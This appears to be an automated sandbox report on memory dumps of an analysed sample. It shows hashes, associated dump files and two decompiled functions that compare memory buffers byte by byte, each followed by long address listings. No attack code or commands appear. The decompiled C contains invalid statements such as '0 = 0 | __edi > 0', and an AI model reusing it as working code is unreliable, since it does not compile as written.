Memory Dump Source

Source File: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c91c032dfb57833e50ed4abe25f29c368b136bddf1dc1f4dea33c082f247fb
Instruction ID: 9813f3121dbcec2672c7620dd86e991ea12206531dbf33284268bedf0fb1c878
Opcode Fuzzy Hash: 10c91c032dfb57833e50ed4abe25f29c368b136bddf1dc1f4dea33c082f247fb
Instruction Fuzzy Hash: 7E92463540E3D19FDB538B7488A51D1BFB1EF5732872E49DBC4C08E067E62A195ACB22

Uniqueness

Uniqueness Score: -1.00%

Function 000B8FB4, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000B8FB4(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x000b8fb4
0x000b8fb4
0x000b8fba
0x000b9041
0x000b9043
0x000b9045
0x00000000
0x00000000
0x000b904b
0x000b9051
0x000b90d8
0x000b90da
0x000b90dc
0x00000000
0x00000000
0x000b90e2
0x000b90e8
0x000b916f
0x000b9171
0x000b9173
0x00000000
0x00000000
0x000b9179
0x000b917f
0x000b9206
0x000b9208
0x000b920a
0x00000000
0x00000000
0x000b9210
0x000b9216
0x000b929d
0x000b929f
0x000b92a1
0x00000000
0x00000000
0x000b92ad
0x000b9335
0x000b9337
0x000b9339
0x00000000
0x00000000
0x000b933f
0x000b9345
0x000b93cc
0x000b93ce
0x000b93d0
0x000b93d0
0x00000000
0x000b93d0
0x000b9352
0x000b9354
0x000b936c
0x000b9374
0x000b9376
0x000b938e
0x000b9396
0x000b9398
0x000b93b0
0x000b93b8
0x000b93ba
0x000b93c3
0x000b93c3
0x00000000
0x000b93ba
0x000b93a1
0x000b93aa
0x00000000
0x00000000
0x00000000
0x000b93aa
0x000b937f
0x000b9388
0x00000000
0x00000000
0x00000000
0x000b9388
0x000b935d
0x000b9366
0x00000000
0x00000000
0x00000000
0x000b9366
0x000b92bb
0x000b92bd
0x000b92d5
0x000b92dd
0x000b92df
0x000b92f7
0x000b92ff
0x000b9301
0x000b9319
0x000b9321
0x000b9323
0x000b932c
0x000b932c
0x00000000
0x000b9323
0x000b930a
0x000b9313
0x00000000
0x00000000
0x00000000
0x000b9313
0x000b92e8
0x000b92f1
0x00000000
0x00000000
0x00000000
0x000b92f1
0x000b92c6
0x000b92cf
0x00000000
0x00000000
0x00000000
0x000b92cf
0x000b9223
0x000b9225
0x000b923d
0x000b9245
0x000b9247
0x000b925f
0x000b9267
0x000b9269
0x000b9281
0x000b9289
0x000b928b
0x000b9294
0x000b9294
0x00000000
0x000b928b
0x000b9272
0x000b927b
0x00000000
0x00000000
0x00000000
0x000b927b
0x000b9250
0x000b9259
0x00000000
0x00000000
0x00000000
0x000b9259
0x000b922e
0x000b9237
0x00000000
0x00000000
0x00000000
0x000b9237
0x000b918c
0x000b918e
0x000b91a6
0x000b91ae
0x000b91b0
0x000b91c8
0x000b91d0
0x000b91d2
0x000b91ea
0x000b91f2
0x000b91f4
0x000b91fd
0x000b91fd
0x00000000
0x000b91f4
0x000b91db
0x000b91e4
0x00000000
0x00000000
0x00000000
0x000b91e4
0x000b91b9
0x000b91c2
0x00000000
0x00000000
0x00000000
0x000b91c2
0x000b9197
0x000b91a0
0x00000000
0x00000000
0x00000000
0x000b91a0
0x000b90f5
0x000b90f7
0x000b910f
0x000b9117
0x000b9119
0x000b9131
0x000b9139
0x000b913b
0x000b9153
0x000b915b
0x000b915d
0x000b9166
0x000b9166
0x00000000
0x000b915d
0x000b9144
0x000b914d
0x00000000
0x00000000
0x00000000
0x000b914d
0x000b9122
0x000b912b
0x00000000
0x00000000
0x00000000
0x000b912b
0x000b9100
0x000b9109
0x00000000
0x00000000
0x00000000
0x000b9109
0x000b905e
0x000b9060
0x000b9078
0x000b9080
0x000b9082
0x000b909a
0x000b90a2
0x000b90a4
0x000b90bc
0x000b90c4
0x000b90c6
0x000b90cf
0x000b90cf
0x00000000
0x000b90c6
0x000b90ad
0x000b90b6
0x00000000
0x00000000
0x00000000
0x000b90b6
0x000b908b
0x000b9094
0x00000000
0x00000000
0x00000000
0x000b9094
0x000b9069
0x000b9072
0x00000000
0x00000000
0x00000000
0x000b8fc0
0x000b8fc0
0x000b8fc7
0x000b8fc9
0x000b8fe1
0x000b8fe1
0x000b8fe9
0x000b8feb
0x000b9003
0x000b9003
0x000b900b
0x000b900d
0x000b9025
0x000b9025
0x000b902d
0x000b902f
0x000b9038
0x000b9038
0x00000000
0x000b902f
0x000b9013
0x000b9016
0x000b901f
0x000b8b77
0x000b8b77
0x000b9967
0x000b9967
0x00000000
0x000b901f
0x000b8ff1
0x000b8ff4
0x000b8ffd
0x00000000
0x00000000
0x00000000
0x000b8ffd
0x000b8fcf
0x000b8fd2
0x000b8fdb
0x00000000
0x00000000
0x00000000
0x000b8fdb

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 3c017e103c2fdcccda6477c50ec8f7cd66c070edd05b7a0b612ee0ce2d84c30e
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 8CC1F6762051934ADFAD463A84348BEFBE15FA27B131A476DD4B3CB4E0EF10C924D620

Uniqueness

Uniqueness Score: -1.00%

Function 000B93E9, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000B93E9(void* __edx, void* __esi) {
				signed int _t196;
				signed char _t197;
				signed char _t198;
				signed char _t199;
				signed char _t201;
				signed char _t202;
				signed int _t245;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t335;

				_t335 = __esi;
				_t293 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t245 = 0;
					L14:
					if(_t245 != 0) {
						goto L1;
					}
					_t197 =  *(_t335 - 0x1b);
					if(_t197 ==  *(_t293 - 0x1b)) {
						_t245 = 0;
						L25:
						if(_t245 != 0) {
							goto L1;
						}
						_t198 =  *(_t335 - 0x17);
						if(_t198 ==  *(_t293 - 0x17)) {
							_t245 = 0;
							L36:
							if(_t245 != 0) {
								goto L1;
							}
							_t199 =  *(_t335 - 0x13);
							if(_t199 ==  *(_t293 - 0x13)) {
								_t245 = 0;
								L47:
								if(_t245 != 0) {
									goto L1;
								}
								if( *(_t335 - 0xf) ==  *(_t293 - 0xf)) {
									_t245 = 0;
									L58:
									if(_t245 != 0) {
										goto L1;
									}
									_t201 =  *(_t335 - 0xb);
									if(_t201 ==  *(_t293 - 0xb)) {
										_t245 = 0;
										L69:
										if(_t245 != 0) {
											goto L1;
										}
										_t202 =  *(_t335 - 7);
										if(_t202 ==  *(_t293 - 7)) {
											_t245 = 0;
											L80:
											if(_t245 != 0) {
												goto L1;
											}
											_t296 = ( *(_t335 - 3) & 0x000000ff) - ( *(_t293 - 3) & 0x000000ff);
											if(_t296 == 0) {
												L83:
												_t298 = ( *(_t335 - 2) & 0x000000ff) - ( *(_t293 - 2) & 0x000000ff);
												if(_t298 == 0) {
													L3:
													_t245 = ( *(_t335 - 1) & 0x000000ff) - ( *(_t293 - 1) & 0x000000ff);
													if(_t245 != 0) {
														_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t245 = (0 | _t298 > 0x00000000) * 2 - 1;
												if(_t245 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t245 = (0 | _t296 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t300 = (_t202 & 0x000000ff) - ( *(_t293 - 7) & 0x000000ff);
										if(_t300 == 0) {
											L73:
											_t302 = ( *(_t335 - 6) & 0x000000ff) - ( *(_t293 - 6) & 0x000000ff);
											if(_t302 == 0) {
												L75:
												_t304 = ( *(_t335 - 5) & 0x000000ff) - ( *(_t293 - 5) & 0x000000ff);
												if(_t304 == 0) {
													L77:
													_t245 = ( *(_t335 - 4) & 0x000000ff) - ( *(_t293 - 4) & 0x000000ff);
													if(_t245 != 0) {
														_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t245 = (0 | _t304 > 0x00000000) * 2 - 1;
												if(_t245 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t245 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t245 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t306 = (_t201 & 0x000000ff) - ( *(_t293 - 0xb) & 0x000000ff);
									if(_t306 == 0) {
										L62:
										_t308 = ( *(_t335 - 0xa) & 0x000000ff) - ( *(_t293 - 0xa) & 0x000000ff);
										if(_t308 == 0) {
											L64:
											_t310 = ( *(_t335 - 9) & 0x000000ff) - ( *(_t293 - 9) & 0x000000ff);
											if(_t310 == 0) {
												L66:
												_t245 = ( *(_t335 - 8) & 0x000000ff) - ( *(_t293 - 8) & 0x000000ff);
												if(_t245 != 0) {
													_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t245 = (0 | _t310 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t245 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t245 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t312 = ( *(_t335 - 0xf) & 0x000000ff) - ( *(_t293 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L51:
									_t314 = ( *(_t335 - 0xe) & 0x000000ff) - ( *(_t293 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L53:
										_t316 = ( *(_t335 - 0xd) & 0x000000ff) - ( *(_t293 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L55:
											_t245 = ( *(_t335 - 0xc) & 0x000000ff) - ( *(_t293 - 0xc) & 0x000000ff);
											if(_t245 != 0) {
												_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t245 = (0 | _t316 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t245 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t245 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t318 = (_t199 & 0x000000ff) - ( *(_t293 - 0x13) & 0x000000ff);
							if(_t318 == 0) {
								L40:
								_t320 = ( *(_t335 - 0x12) & 0x000000ff) - ( *(_t293 - 0x12) & 0x000000ff);
								if(_t320 == 0) {
									L42:
									_t322 = ( *(_t335 - 0x11) & 0x000000ff) - ( *(_t293 - 0x11) & 0x000000ff);
									if(_t322 == 0) {
										L44:
										_t245 = ( *(_t335 - 0x10) & 0x000000ff) - ( *(_t293 - 0x10) & 0x000000ff);
										if(_t245 != 0) {
											_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t245 = (0 | _t322 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t245 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t245 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t324 = (_t198 & 0x000000ff) - ( *(_t293 - 0x17) & 0x000000ff);
						if(_t324 == 0) {
							L29:
							_t326 = ( *(_t335 - 0x16) & 0x000000ff) - ( *(_t293 - 0x16) & 0x000000ff);
							if(_t326 == 0) {
								L31:
								_t328 = ( *(_t335 - 0x15) & 0x000000ff) - ( *(_t293 - 0x15) & 0x000000ff);
								if(_t328 == 0) {
									L33:
									_t245 = ( *(_t335 - 0x14) & 0x000000ff) - ( *(_t293 - 0x14) & 0x000000ff);
									if(_t245 != 0) {
										_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t245 = (0 | _t328 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t245 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t245 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t245 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t330 = (_t197 & 0x000000ff) - ( *(_t293 - 0x1b) & 0x000000ff);
					if(_t330 == 0) {
						L18:
						_t332 = ( *(_t335 - 0x1a) & 0x000000ff) - ( *(_t293 - 0x1a) & 0x000000ff);
						if(_t332 == 0) {
							L20:
							_t334 = ( *(_t335 - 0x19) & 0x000000ff) - ( *(_t293 - 0x19) & 0x000000ff);
							if(_t334 == 0) {
								L22:
								_t245 = ( *(_t335 - 0x18) & 0x000000ff) - ( *(_t293 - 0x18) & 0x000000ff);
								if(_t245 != 0) {
									_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t245 = (0 | _t334 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t245 = (0 | _t332 > 0x00000000) * 2 - 1;
						if(_t245 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t245 = (0 | _t330 > 0x00000000) * 2 - 1;
					if(_t245 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t196 = _t245;
				return _t196;
			}

0x000b93e9
0x000b93e9
0x000b93ef
0x000b9476
0x000b9478
0x000b947a
0x00000000
0x00000000
0x000b9480
0x000b9486
0x000b950d
0x000b950f
0x000b9511
0x00000000
0x00000000
0x000b9517
0x000b951d
0x000b95a4
0x000b95a6
0x000b95a8
0x00000000
0x00000000
0x000b95ae
0x000b95b4
0x000b963b
0x000b963d
0x000b963f
0x00000000
0x00000000
0x000b964b
0x000b96d3
0x000b96d5
0x000b96d7
0x00000000
0x00000000
0x000b96dd
0x000b96e3
0x000b976a
0x000b976c
0x000b976e
0x00000000
0x00000000
0x000b9774
0x000b977a
0x000b9801
0x000b9803
0x000b9805
0x00000000
0x00000000
0x000b9813
0x000b9815
0x000b982d
0x000b9835
0x000b9837
0x000b8f91
0x000b8f99
0x000b8f9b
0x000b8fa8
0x000b8fa8
0x00000000
0x000b8f9b
0x000b9844
0x000b8f8b
0x00000000
0x00000000
0x00000000
0x00000000
0x000b8f8b
0x000b981e
0x000b9827
0x00000000
0x00000000
0x00000000
0x000b9827
0x000b9787
0x000b9789
0x000b97a1
0x000b97a9
0x000b97ab
0x000b97c3
0x000b97cb
0x000b97cd
0x000b97e5
0x000b97ed
0x000b97ef
0x000b97f8
0x000b97f8
0x00000000
0x000b97ef
0x000b97d6
0x000b97df
0x00000000
0x00000000
0x00000000
0x000b97df
0x000b97b4
0x000b97bd
0x00000000
0x00000000
0x00000000
0x000b97bd
0x000b9792
0x000b979b
0x00000000
0x00000000
0x00000000
0x000b979b
0x000b96f0
0x000b96f2
0x000b970a
0x000b9712
0x000b9714
0x000b972c
0x000b9734
0x000b9736
0x000b974e
0x000b9756
0x000b9758
0x000b9761
0x000b9761
0x00000000
0x000b9758
0x000b973f
0x000b9748
0x00000000
0x00000000
0x00000000
0x000b9748
0x000b971d
0x000b9726
0x00000000
0x00000000
0x00000000
0x000b9726
0x000b96fb
0x000b9704
0x00000000
0x00000000
0x00000000
0x000b9704
0x000b9659
0x000b965b
0x000b9673
0x000b967b
0x000b967d
0x000b9695
0x000b969d
0x000b969f
0x000b96b7
0x000b96bf
0x000b96c1
0x000b96ca
0x000b96ca
0x00000000
0x000b96c1
0x000b96a8
0x000b96b1
0x00000000
0x00000000
0x00000000
0x000b96b1
0x000b9686
0x000b968f
0x00000000
0x00000000
0x00000000
0x000b968f
0x000b9664
0x000b966d
0x00000000
0x00000000
0x00000000
0x000b966d
0x000b95c1
0x000b95c3
0x000b95db
0x000b95e3
0x000b95e5
0x000b95fd
0x000b9605
0x000b9607
0x000b961f
0x000b9627
0x000b9629
0x000b9632
0x000b9632
0x00000000
0x000b9629
0x000b9610
0x000b9619
0x00000000
0x00000000
0x00000000
0x000b9619
0x000b95ee
0x000b95f7
0x00000000
0x00000000
0x00000000
0x000b95f7
0x000b95cc
0x000b95d5
0x00000000
0x00000000
0x00000000
0x000b95d5
0x000b952a
0x000b952c
0x000b9544
0x000b954c
0x000b954e
0x000b9566
0x000b956e
0x000b9570
0x000b9588
0x000b9590
0x000b9592
0x000b959b
0x000b959b
0x00000000
0x000b9592
0x000b9579
0x000b9582
0x00000000
0x00000000
0x00000000
0x000b9582
0x000b9557
0x000b9560
0x00000000
0x00000000
0x00000000
0x000b9560
0x000b9535
0x000b953e
0x00000000
0x00000000
0x00000000
0x000b953e
0x000b9493
0x000b9495
0x000b94ad
0x000b94b5
0x000b94b7
0x000b94cf
0x000b94d7
0x000b94d9
0x000b94f1
0x000b94f9
0x000b94fb
0x000b9504
0x000b9504
0x00000000
0x000b94fb
0x000b94e2
0x000b94eb
0x00000000
0x00000000
0x00000000
0x000b94eb
0x000b94c0
0x000b94c9
0x00000000
0x00000000
0x00000000
0x000b94c9
0x000b949e
0x000b94a7
0x00000000
0x00000000
0x00000000
0x000b93f5
0x000b93f5
0x000b93fc
0x000b93fe
0x000b9416
0x000b9416
0x000b941e
0x000b9420
0x000b9438
0x000b9438
0x000b9440
0x000b9442
0x000b945a
0x000b945a
0x000b9462
0x000b9464
0x000b946d
0x000b946d
0x00000000
0x000b9464
0x000b9448
0x000b944b
0x000b9454
0x00000000
0x00000000
0x00000000
